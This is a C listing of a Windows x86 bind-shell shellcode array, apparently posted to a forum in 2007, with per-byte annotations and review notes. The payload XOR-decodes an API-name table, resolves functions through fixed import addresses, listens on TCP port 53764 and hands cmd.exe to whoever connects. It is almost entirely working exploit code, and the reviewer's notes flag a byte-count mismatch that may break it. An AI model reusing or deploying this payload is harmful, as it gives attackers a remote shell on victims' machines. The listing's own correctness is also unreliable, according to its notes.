2007-1-19 13:51
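/*
 * Windows x86 bind-shell payload (forum posting dated 2007-01-19).
 *
 * Behaviour, as established by the annotated bytes below:
 *   1. REPNZ SCASD scans the stack upward from ESP for a 0xFFFFFFFF dword
 *      (the marker near the end of this buffer), then XORs 0xC6 = 198 bytes
 *      backwards from the marker with 0x99 to reveal the string table.
 *   2. LoadLibraryA and GetProcAddress are reached through FIXED pointers
 *      0x004261E8 and 0x004261E4 (ebx after shr ebx,8 and mov bl,..).
 *      These are presumably IAT slots of one specific victim image, so the
 *      payload only works against that exact build - confirm on the target.
 *   3. Sixteen resolved function pointers are STOSD'd starting at marker+4,
 *      i.e. past the end of the payload into whatever is on the stack there;
 *      SECURITY_ATTRIBUTES / STARTUPINFOA / PROCESS_INFORMATION scratch
 *      follows the table. Callers are [edi-0x40] .. [edi-0x04].
 *   4. socket/bind/listen on TCP 53764 (AF_INET, INADDR_ANY), accept one
 *      client, CreateProcessA("cmd.exe") with stdio on two anonymous pipes,
 *      then relay pipe->socket (PeekNamedPipe/ReadFile/send) and
 *      socket->pipe (recv/WriteFile) with Sleep(0x50) between rounds.
 *      ExitProcess when ReadFile on the child's stdout fails.
 *
 * Listing review notes (payload bytes are byte-for-byte the posted ones):
 *   - In the posted listing many comment openers had no closing delimiter,
 *     so the following source lines - and their byte values, e.g. the
 *     0x33,0xc0 and 0x50 right after mov edi,esp - became comment text and
 *     were silently dropped from the array. Every comment is closed here.
 *   - The initializer supplies 542 bytes; the declared size 580 leaves the
 *     last 38 bytes zero-filled.
 *   - The encoded table is 194 bytes (18 NUL-terminated names = 170 bytes,
 *     sockaddr_in = 16, "cmd.exe\0" = 8) but the decoder runs 198 rounds.
 *     NOTE(review): by that count the extra 4 rounds also flip the trailing
 *     nop and the three bytes of call [edi-0x1C] (ExitProcess), and ESI then
 *     points 4 bytes before "KERNEL32" when LoadLibraryA is called. Either
 *     the posting lost 4 table bytes or the stub is off by 4; verify against
 *     the assembled original before relying on this listing.
 *   - No return value is checked (bind, listen, CreatePipe, CreateProcessA,
 *     recv); a failed recv() hands SOCKET_ERROR to WriteFile as the length.
 *   - The recv() length (0x400) matches the GlobalAlloc size, so the relay
 *     buffer itself is not overrun.
 */
unsigned char sploit[580] = {
/* ---- decoder stub: locate the marker, XOR-decode the table backwards ---- */
0x90, 0x8b, 0xfc,             /* nop; mov edi, esp                                        */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x50,                         /* push eax             ; 0, popped into ecx after the scan */
0xf7, 0xd0,                   /* not eax              ; eax = 0xFFFFFFFF (scan value)     */
0x50,                         /* push eax                                                 */
0x59,                         /* pop ecx              ; ecx = -1, effectively unbounded   */
0xf2,                         /* repnz                                                    */
0xaf,                         /* scasd                ; find 0xFFFFFFFF above ESP; edi = marker+4 */
0x59,                         /* pop ecx              ; ecx = 0                           */
0xb1, 0xc6,                   /* mov cl, 0xC6         ; 198 bytes to decode (see header)  */
0x8b, 0xc7,                   /* mov eax, edi                                             */
/* Xorshellcode: */
0x48,                         /* dec eax                                                  */
0x80, 0x30, 0x99,             /* xor byte ptr [eax], 0x99                                 */
0xe2, 0xfa,                   /* loop Xorshellcode                                        */
/* ---- kernel32: LoadLibraryA("KERNEL32"), then 10 x GetProcAddress ---- */
0x33, 0xf6,                   /* xor esi, esi                                             */
0x96,                         /* xchg eax, esi        ; esi -> decoded table, eax = 0     */
0xbb, 0x99, 0xe8, 0x61, 0x42, /* mov ebx, 0x4261E899                                      */
0xc1, 0xeb, 0x08,             /* shr ebx, 8           ; ebx = 0x004261E8, presumably LoadLibraryA IAT slot */
0x56,                         /* push esi             ; lpLibFileName = "KERNEL32"        */
0xff, 0x13,                   /* call dword ptr [ebx] ; LoadLibraryA                      */
0x8b, 0xd0,                   /* mov edx, eax         ; edx = hKernel32                   */
0xfc,                         /* cld                                                      */
0x33, 0xc9,                   /* xor ecx, ecx                                             */
0xb1, 0x0b,                   /* mov cl, 0x0B                                             */
0x49,                         /* dec ecx              ; 10 kernel32 names follow          */
/* loadKernelProcess: skip the current NUL-terminated name, resolve the next */
0x32, 0xc0,                   /* xor al, al                                               */
0xac,                         /* lodsb                                                    */
0x84, 0xc0,                   /* test al, al                                              */
0x75, 0xf9,                   /* jne loadKernelProcess                                    */
0x52,                         /* push edx             ; save hModule                      */
0x51,                         /* push ecx             ; save counter                      */
0x56,                         /* push esi             ; lpProcName                        */
0x52,                         /* push edx             ; hModule                           */
0xb3, 0xe4,                   /* mov bl, 0xE4         ; ebx = 0x004261E4, presumably GetProcAddress IAT slot */
0xff, 0x13,                   /* call dword ptr [ebx] ; GetProcAddress                    */
0xab,                         /* stosd                ; append pointer to table at edi    */
0x59,                         /* pop ecx                                                  */
0x5a,                         /* pop edx                                                  */
0xe2, 0xec,                   /* loop loadKernelProcess                                   */
/* ---- wsock32: LoadLibraryA("WSOCK32"), then 6 x GetProcAddress ---- */
0x32, 0xc0,                   /* xor al, al                                               */
0xac,                         /* lodsb                                                    */
0x84, 0xc0,                   /* test al, al                                              */
0x75, 0xf9,                   /* jne (back 7)         ; skip past "ExitProcess\0"         */
0xb3, 0xe8,                   /* mov bl, 0xE8         ; ebx -> LoadLibraryA slot again    */
0x56,                         /* push esi             ; lpLibFileName = "WSOCK32"         */
0xff, 0x13,                   /* call dword ptr [ebx] ; LoadLibraryA                      */
0x8b, 0xd0,                   /* mov edx, eax         ; edx = hWsock32                    */
0xfc,                         /* cld                                                      */
0x33, 0xc9,                   /* xor ecx, ecx                                             */
0xb1, 0x06,                   /* mov cl, 6            ; 6 socket names follow             */
/* loadSocketProcess: */
0x32, 0xc0,                   /* xor al, al                                               */
0xac,                         /* lodsb                                                    */
0x84, 0xc0,                   /* test al, al                                              */
0x75, 0xf9,                   /* jne loadSocketProcess                                    */
0x52,                         /* push edx                                                 */
0x51,                         /* push ecx                                                 */
0x56,                         /* push esi             ; lpProcName                        */
0x52,                         /* push edx             ; hModule                           */
0xb3, 0xe4,                   /* mov bl, 0xE4         ; GetProcAddress slot               */
0xff, 0x13,                   /* call dword ptr [ebx]                                     */
0xab,                         /* stosd                                                    */
0x59,                         /* pop ecx                                                  */
0x5a,                         /* pop edx                                                  */
0xe2, 0xec,                   /* loop loadSocketProcess                                   */
/* ---- socket(AF_INET, SOCK_STREAM, 0); bind(port 53764); listen(2) ---- */
0x83, 0xc6, 0x05,             /* add esi, 5           ; skip "recv\0", esi -> sockaddr_in */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x50,                         /* push eax             ; protocol = 0                      */
0x40,                         /* inc eax                                                  */
0x50,                         /* push eax             ; type = SOCK_STREAM (1)            */
0x40,                         /* inc eax                                                  */
0x50,                         /* push eax             ; af = AF_INET (2)                  */
0xff, 0x57, 0xe8,             /* call [edi-0x18]      ; socket()                          */
0x93,                         /* xchg eax, ebx        ; ebx = listening SOCKET            */
0x6a, 0x10,                   /* push 0x10            ; namelen = sizeof(sockaddr_in)     */
0x56,                         /* push esi             ; name (AF_INET, 53764, INADDR_ANY) */
0x53,                         /* push ebx             ; s                                 */
0xff, 0x57, 0xec,             /* call [edi-0x14]      ; bind()  (result unchecked)        */
0x6a, 0x02,                   /* push 2               ; backlog                           */
0x53,                         /* push ebx             ; s                                 */
0xff, 0x57, 0xf0,             /* call [edi-0x10]      ; listen() (result unchecked)       */
/* ---- SECURITY_ATTRIBUTES {12, NULL, TRUE} at edi (just past the table) ---- */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x57,                         /* push edi             ; remember struct address           */
0x50,                         /* push eax             ; 0, reloaded below                 */
0xb0, 0x0c,                   /* mov al, 0x0C                                             */
0xab,                         /* stosd                ; nLength = 12                      */
0x58,                         /* pop eax                                                  */
0xab,                         /* stosd                ; lpSecurityDescriptor = NULL       */
0x40,                         /* inc eax                                                  */
0xab,                         /* stosd                ; bInheritHandle = TRUE             */
0x5f,                         /* pop edi              ; edi -> SECURITY_ATTRIBUTES        */
/* ---- two anonymous pipes; handles overwrite the now-unused sockaddr_in ---- */
0x48,                         /* dec eax              ; eax = 0                           */
0x50,                         /* push eax             ; nSize = 0                         */
0x57,                         /* push edi             ; lpPipeAttributes (inheritable)    */
0x56,                         /* push esi             ; hWritePipe -> [sa+0]  child stdout write end */
0xad,                         /* lodsd                ; esi += 4                          */
0x56,                         /* push esi             ; hReadPipe  -> [sa+4]  parent reads child stdout */
0xff, 0x57, 0xc0,             /* call [edi-0x40]      ; CreatePipe                        */
0x48,                         /* dec eax              ; BOOL 1 -> 0 (assumes success)     */
0x50,                         /* push eax             ; nSize = 0                         */
0x57,                         /* push edi             ; lpPipeAttributes                  */
0xad,                         /* lodsd                                                    */
0x56,                         /* push esi             ; hWritePipe -> [sa+8]  parent writes child stdin */
0xad,                         /* lodsd                                                    */
0x56,                         /* push esi             ; hReadPipe  -> [sa+12] child stdin read end */
0xff, 0x57, 0xc0,             /* call [edi-0x40]      ; CreatePipe again                  */
/* ---- STARTUPINFOA at edi (overwrites the SECURITY_ATTRIBUTES scratch) ---- */
0x48,                         /* dec eax              ; eax = 0 (assumes CreatePipe returned 1) */
0xb0, 0x44,                   /* mov al, 0x44                                             */
0x89, 0x07,                   /* mov [edi], eax       ; cb = sizeof(STARTUPINFOA)         */
0x57,                         /* push edi                                                 */
0xff, 0x57, 0xc4,             /* call [edi-0x3C]      ; GetStartupInfoA                   */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x8b, 0x46, 0xf4,             /* mov eax, [esi-0x0C]  ; pipe1 write handle                */
0x89, 0x47, 0x3c,             /* mov [edi+0x3C], eax  ; hStdOutput                        */
0x89, 0x47, 0x40,             /* mov [edi+0x40], eax  ; hStdError                         */
0x8b, 0x06,                   /* mov eax, [esi]       ; pipe2 read handle                 */
0x89, 0x47, 0x38,             /* mov [edi+0x38], eax  ; hStdInput                         */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x66, 0xb8, 0x01, 0x01,       /* mov ax, 0x0101                                           */
0x89, 0x47, 0x2c,             /* mov [edi+0x2C], eax  ; dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW; wShowWindow is whatever GetStartupInfoA left */
/* ---- CreateProcessA(NULL, "cmd.exe", 0, 0, TRUE, 0, 0, 0, &si, &pi) ---- */
0x57,                         /* push edi             ; lpProcessInformation (reuses si) */
0x57,                         /* push edi             ; lpStartupInfo                     */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x50,                         /* push eax             ; lpCurrentDirectory = NULL         */
0x50,                         /* push eax             ; lpEnvironment = NULL              */
0x50,                         /* push eax             ; dwCreationFlags = 0               */
0x40,                         /* inc eax                                                  */
0x50,                         /* push eax             ; bInheritHandles = TRUE            */
0x48,                         /* dec eax                                                  */
0x50,                         /* push eax             ; lpThreadAttributes = NULL         */
0x50,                         /* push eax             ; lpProcessAttributes = NULL        */
0xad,                         /* lodsd                ; esi -> "cmd.exe"                  */
0x56,                         /* push esi             ; lpCommandLine                     */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x50,                         /* push eax             ; lpApplicationName = NULL          */
0xff, 0x57, 0xc8,             /* call [edi-0x38]      ; CreateProcessA (result unchecked) */
/* ---- parent drops its copies of the child-side pipe ends ---- */
0xff, 0x76, 0xf0,             /* push [esi-0x10]      ; pipe1 write handle                */
0xff, 0x57, 0xcc,             /* call [edi-0x34]      ; CloseHandle                       */
0xff, 0x76, 0xfc,             /* push [esi-0x04]      ; pipe2 read handle                 */
0xff, 0x57, 0xcc,             /* call [edi-0x34]      ; CloseHandle                       */
/* ---- accept(s, NULL, NULL) ---- */
0x48,                         /* dec eax              ; eax = 0 (assumes CloseHandle returned TRUE) */
0x50,                         /* push eax             ; addrlen = NULL                    */
0x50,                         /* push eax             ; addr = NULL                       */
0x53,                         /* push ebx             ; s = listening socket              */
0xff, 0x57, 0xf4,             /* call [edi-0x0C]      ; accept()                          */
0x8b, 0xd8,                   /* mov ebx, eax         ; ebx = client SOCKET               */
/* ---- GlobalAlloc(GMEM_ZEROINIT, 0x400) relay buffer ---- */
0x33, 0xc0,                   /* xor eax, eax                                             */
0xb4, 0x04,                   /* mov ah, 4            ; eax = 0x400                       */
0x50,                         /* push eax             ; dwBytes = 1024                    */
0xc1, 0xe8, 0x04,             /* shr eax, 4           ; eax = 0x40                        */
0x50,                         /* push eax             ; uFlags = GMEM_ZEROINIT (GMEM_FIXED is 0) */
0xff, 0x57, 0xd4,             /* call [edi-0x2C]      ; GlobalAlloc                       */
0x8b, 0xf0,                   /* mov esi, eax         ; esi = relay buffer                */
/* PeekPipe: poll child stdout; if data is pending, ReadFile it and send() it */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x8b, 0xc8,                   /* mov ecx, eax                                             */
0xb5, 0x04,                   /* mov ch, 4            ; ecx = 0x400                       */
0x50,                         /* push eax             ; lpBytesLeftThisMessage = NULL     */
0x50,                         /* push eax             ; lpTotalBytesAvail = NULL          */
0x57,                         /* push edi             ; lpBytesRead -> [edi]              */
0x51,                         /* push ecx             ; nBufferSize = 1024                */
0x56,                         /* push esi             ; lpBuffer                          */
0xff, 0x77, 0xa8,             /* push [edi-0x58]      ; hNamedPipe = pipe1 read handle    */
0xff, 0x57, 0xd0,             /* call [edi-0x30]      ; PeekNamedPipe                     */
0x83, 0x3f, 0x01,             /* cmp dword ptr [edi], 1 ; any bytes pending?              */
0x7c, 0x22,                   /* jl GetUserInput      ; none: service the socket instead  */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x50,                         /* push eax             ; lpOverlapped = NULL               */
0x57,                         /* push edi             ; lpNumberOfBytesRead               */
0xff, 0x37,                   /* push [edi]           ; nNumberOfBytesToRead (<= 1024, from the peek) */
0x56,                         /* push esi             ; lpBuffer                          */
0xff, 0x77, 0xa8,             /* push [edi-0x58]      ; hFile = pipe1 read handle         */
0xff, 0x57, 0xdc,             /* call [edi-0x24]      ; ReadFile                          */
0x0b, 0xc0,                   /* or eax, eax                                              */
0x74, 0x2f,                   /* je GameOver          ; ReadFile failed (child gone)      */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x50,                         /* push eax             ; flags = 0                         */
0xff, 0x37,                   /* push [edi]           ; len = bytes read                  */
0x56,                         /* push esi             ; buf                               */
0x53,                         /* push ebx             ; s = client socket                 */
0xff, 0x57, 0xf8,             /* call [edi-0x08]      ; send()                            */
0x6a, 0x50,                   /* push 0x50                                                */
0xff, 0x57, 0xe0,             /* call [edi-0x20]      ; Sleep(80 ms)                      */
0xeb, 0xc8,                   /* jmp PeekPipe                                             */
/* GetUserInput: blocking recv() from the client, WriteFile() to child stdin */
0x33, 0xc0,                   /* xor eax, eax                                             */
0x50,                         /* push eax             ; flags = 0                         */
0xb4, 0x04,                   /* mov ah, 4            ; eax = 0x400                       */
0x50,                         /* push eax             ; len = 1024 (= GlobalAlloc size)   */
0x56,                         /* push esi             ; buf                               */
0x53,                         /* push ebx             ; s = client socket                 */
0xff, 0x57, 0xfc,             /* call [edi-0x04]      ; recv(); eax = byte count, 0 on close, SOCKET_ERROR on failure (unchecked) */
0x57,                         /* push edi             ; lpOverlapped = edi (non-NULL so the byte-count pointer may be NULL) */
0x33, 0xc9,                   /* xor ecx, ecx                                             */
0x51,                         /* push ecx             ; lpNumberOfBytesWritten = NULL     */
0x50,                         /* push eax             ; nNumberOfBytesToWrite = recv result */
0x56,                         /* push esi             ; lpBuffer                          */
0xff, 0x77, 0xac,             /* push [edi-0x54]      ; hFile = pipe2 write handle        */
0xff, 0x57, 0xd8,             /* call [edi-0x28]      ; WriteFile (client -> cmd.exe stdin) */
0x6a, 0x50,                   /* push 0x50                                                */
0xff, 0x57, 0xe0,             /* call [edi-0x20]      ; Sleep(80 ms)                      */
0xeb, 0xaa,                   /* jmp PeekPipe                                             */
/* GameOver: (target of je above; it lands after the jmp, not before it) */
0x50,                         /* push eax             ; uExitCode = 0                     */
0xff, 0x57, 0xe4,             /* call [edi-0x1C]      ; ExitProcess - these 3 bytes and the nop fall inside the 198-byte XOR window, see header */
0x90,                         /* nop                                                      */
/* ---- XOR-0x99 encoded table, 194 bytes, decoded in place at run time ---- */
0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,                         /* "KERNEL32\0"        */
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99,             /* "CreatePipe\0"      */
0xde, 0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99,                                                             /* "GetStartupInfoA\0" */
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea,
0xd8, 0x99,                                                                   /* "CreateProcessA\0"  */
0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1, 0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99,       /* "CloseHandle\0"     */
0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8, 0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc,
0x99,                                                                         /* "PeekNamedPipe\0"   */
0xde, 0xf5, 0xf6, 0xfb, 0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99,       /* "GlobalAlloc\0"     */
0xce, 0xeb, 0xf0, 0xed, 0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99,                   /* "WriteFile\0"       */
0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0, 0xf5, 0xfc, 0x99,                         /* "ReadFile\0"        */
0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99,                                           /* "Sleep\0"           */
0xdc, 0xe1, 0xf0, 0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99,       /* "ExitProcess\0"     */
0xce, 0xca, 0xd6, 0xda, 0xd2, 0xaa, 0xab, 0x99,                               /* "WSOCK32\0"         */
0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,                                     /* "socket\0"          */
0xfb, 0xf0, 0xf7, 0xfd, 0x99,                                                 /* "bind\0"            */
0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,                                     /* "listen\0"          */
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99,                                     /* "accept\0"          */
0xea, 0xfc, 0xf7, 0xfd, 0x99,                                                 /* "send\0"            */
0xeb, 0xfc, 0xfa, 0xef, 0x99,                                                 /* "recv\0"            */
/* sockaddr_in (16 bytes) */
0x9b, 0x99,                                                                   /* sin_family = AF_INET (2)                       */
0x4b, 0x9d,                                                                   /* sin_port = 0xD204 big-endian = 53764            */
0x99, 0x99, 0x99, 0x99,                                                       /* sin_addr = INADDR_ANY                          */
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,                               /* sin_zero                                       */
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99,                               /* "cmd.exe\0" (lpCommandLine; pipe handles land in the sockaddr above) */
0xff, 0xff, 0xff, 0xff,                                                       /* marker found by repnz scasd; function table is written from here on */
0x0d, 0x0a};                                                                  /* CRLF trailer for the delivery protocol; 38 trailing bytes zero-filled */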